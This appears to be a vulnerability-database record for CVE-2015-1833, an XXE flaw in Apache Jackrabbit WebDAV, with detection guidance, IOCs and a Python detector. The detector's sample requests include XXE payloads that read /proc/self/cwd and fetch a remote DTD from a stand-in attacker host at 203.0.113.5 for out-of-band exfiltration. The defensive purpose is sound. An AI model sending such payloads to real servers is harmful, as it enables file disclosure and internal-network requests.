cbcvebase.
CVE-2015-1833
published 2015-05-29

Priority: P2 (62)
CVSS 2.0: 6.4 medium, AV:N/AC:L/Au:N/C:P/I:P/A:N
Exploit: public exploit available
EPSS: 51.49% (98.8th percentile)
XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to intranet servers via a crafted WebDAV request.

Affected

Vendor   Product      Version range         Fixed in
apache   jackrabbit   <= 2.0.5              2.0.6
apache   jackrabbit   2.2.x, <= 2.2.13      2.2.14
apache   jackrabbit   2.4.x, <= 2.4.5       2.4.6
apache   jackrabbit   2.6.x, <= 2.6.5       2.6.6
apache   jackrabbit   2.8.x, < 2.8.1        2.8.1
apache   jackrabbit   2.10.x, < 2.10.1      2.10.1

Detection & IOCs (extracted from sources)

path:  /proc/self/cwd
port:  9998
port:  9999
other: 220 xxe-ftp-server
  • Detect XXE exploitation attempts against WebDAV endpoints by inspecting PROPPATCH and PROPFIND requests whose XML body carries a DOCTYPE with ENTITY declarations that reference external URIs (file://, http://, https://). Legitimate WebDAV clients do not send a DTD at all, so any DOCTYPE in these bodies deserves a look.
  • Alert on outbound FTP connections from the WebDAV server process (the Java process hosting Jackrabbit) to attacker-controlled hosts; the FTP banner '220 xxe-ftp-server' is the OOB exfiltration channel used by the public exploit. The banner and listener ports are PoC defaults that an attacker can change in one line, so the durable signal is the server process initiating any outbound FTP or HTTP connection at all.
  • Monitor requests to WebDAV endpoints with Content-Type: application/xml (or text/xml) and the verbs PROPPATCH or PROPFIND for embedded external entity references.
  • Detect file:// URIs within the XML bodies of WebDAV requests, especially references to /proc/self/cwd, which the exploit uses to enumerate the server's working directory.
  • Flag WebDAV requests whose XML body contains http(s) or file URIs, since either can trigger internal network requests (SSRF) or file disclosure via XXE.
  • The public exploit supports three techniques (inb1, inb2, oob) with different requirements: inb1 needs no listener reachable from the server but has content limitations (data that is not well-formed XML cannot be returned in-band); inb2 requires valid credentials and an attacker-visible IP; oob works with anonymous credentials but is less stable.
  • The vulnerability affects not only Apache Jackrabbit itself but also software that embeds its WebDAV component, including Apache Sling and Adobe AEM.
  • The OOB technique runs an FTP server (default port 9999) and an HTTP server (default port 9998) on the attacker side to receive exfiltrated data; detection must cover both channels.
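Detection logic for the notes above, as an added example in Python (not code from this record, from the exploit, or from Jackrabbit): inspect_webdav_request parses a raw PROPFIND/PROPPATCH request and reports external or parameter entity declarations in its DTD, and flag_oob_connections matches outbound-connection log lines against the PoC's FTP/HTTP listener ports and banner. The three HTTP requests, the connection-log line format, the attacker host 203.0.113.5 and the process name are constructed for the example and are assumptions; the /proc/self/cwd path, ports 9998/9999 and the '220 xxe-ftp-server' banner are the record's own IOCs.

```python
"""Detection helpers for CVE-2015-1833-style XXE against WebDAV (added example)."""
import re
from dataclasses import dataclass
from typing import List, Tuple

WEBDAV_XML_METHODS = {"PROPFIND", "PROPPATCH"}
EXTERNAL_SCHEMES = ("file:", "http:", "https:", "ftp:")
SENSITIVE_PATHS = ("/proc/self/cwd",)       # path IOC from the record
OOB_PORTS = {9998, 9999}                     # PoC HTTP / FTP listener defaults
OOB_BANNER = "220 xxe-ftp-server"            # PoC FTP banner from the record

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri">, or PUBLIC "id" "uri"
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?[\w.-]+\s+"
    r"(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+)"
    r"(?:\"([^\"]*)\"|'([^']*)')", re.I)


@dataclass
class Finding:
    method: str
    target: str
    reason: str
    uri: str = ""


def parse_request(raw: bytes) -> Tuple[str, str, dict, str]:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers, body.decode("utf-8", "replace")


def inspect_webdav_request(raw: bytes) -> List[Finding]:
    """Flag PROPFIND/PROPPATCH bodies whose DTD declares external (or parameter) entities."""
    method, target, headers, body = parse_request(raw)
    findings: List[Finding] = []
    if method not in WEBDAV_XML_METHODS:
        return findings
    is_xml = "xml" in headers.get("content-type", "").lower() or body.lstrip().startswith("<")
    if not is_xml or not DOCTYPE_RE.search(body):
        return findings                      # no DTD means no entity declarations
    for m in ENTITY_RE.finditer(body):
        uri = m.group(2) or m.group(3) or ""
        low = uri.lower()
        if not low.startswith(EXTERNAL_SCHEMES):
            continue                         # internal entity: harmless for this check
        reason = "external entity (%s)" % low.split(":", 1)[0]
        if m.group(1):
            reason = "parameter " + reason   # %x; style: pulls a remote DTD (OOB staging)
        hit = [p for p in SENSITIVE_PATHS if p in low]
        if hit:
            reason += ", reads " + ",".join(hit)
        findings.append(Finding(method, target, reason, uri))
    if not findings:
        # A DOCTYPE with no external entity is still odd for a WebDAV client; low severity.
        findings.append(Finding(method, target, "DOCTYPE in WebDAV body, no external entity"))
    return findings


# Constructed log-line shape (assumption): "<proc> <src>:<port> -> <dst>:<port> [banner='...']"
CONN_RE = re.compile(r"(?P<proc>\S+)\s+(?P<src>\S+)\s+->\s+(?P<dst>[\d.]+):(?P<port>\d+)"
                     r"(?:\s+banner='(?P<banner>[^']*)')?")


def flag_oob_connections(log_lines: List[str]) -> List[Tuple[str, int, str]]:
    """Return (dst, port, reason) for outbound connections matching the PoC's OOB channel."""
    hits = []
    for line in log_lines:
        m = CONN_RE.search(line)
        if not m:
            continue
        port, banner = int(m.group("port")), m.group("banner") or ""
        reasons = []
        if port in OOB_PORTS:
            reasons.append("PoC default port %d" % port)
        if banner == OOB_BANNER:
            reasons.append("PoC FTP banner")
        if reasons:
            hits.append((m.group("dst"), port, "; ".join(reasons)))
    return hits


# Constructed samples, not captured traffic.
BENIGN_PROPFIND = (b"PROPFIND /repository/default/ HTTP/1.1\r\nHost: jackrabbit.example\r\n"
                   b"Depth: 1\r\nContent-Type: application/xml\r\n\r\n"
                   b'<?xml version="1.0"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>')
INBAND_PROPPATCH = (b"PROPPATCH /repository/default/x.txt HTTP/1.1\r\nHost: jackrabbit.example\r\n"
                    b"Content-Type: application/xml\r\n\r\n"
                    b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///proc/self/cwd">]>'
                    b'<D:propertyupdate xmlns:D="DAV:"><D:set><D:prop><x>&xxe;</x></D:prop></D:set>'
                    b"</D:propertyupdate>")
OOB_PROPFIND = (b"PROPFIND /repository/default/ HTTP/1.1\r\nHost: jackrabbit.example\r\n"
                b"Content-Type: text/xml\r\n\r\n"
                b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://203.0.113.5:9998/x.dtd">'
                b'%dtd;]><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>')
CONN_LOG = [
    "java[2201] 10.0.0.5:49152 -> 203.0.113.5:9999 banner='220 xxe-ftp-server'",
    "java[2201] 10.0.0.5:49153 -> 203.0.113.5:9998",
    "java[2201] 10.0.0.5:49154 -> 10.0.0.9:443",
]

if __name__ == "__main__":
    for req in (BENIGN_PROPFIND, INBAND_PROPPATCH, OOB_PROPFIND):
        print(inspect_webdav_request(req))
    print(flag_oob_connections(CONN_LOG))
```

The request-level check cannot see what a remote DTD fetched through a parameter entity will do once loaded, which is exactly the oob technique, so the connection-log check is the backstop for that path; and because the listener ports and FTP banner are one-line defaults in the PoC, the port and banner matches should be read as confirmation, with the server process making any outbound FTP or HTTP connection as the primary alert.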

CVSS provenance

nvd:            v2.0  6.4  MEDIUM  AV:N/AC:L/Au:N/C:P/I:P/A:N
osv:                  6.4  MEDIUM
vendor_debian:        6.4  MEDIUM
vendor_redhat:        6.4  MEDIUM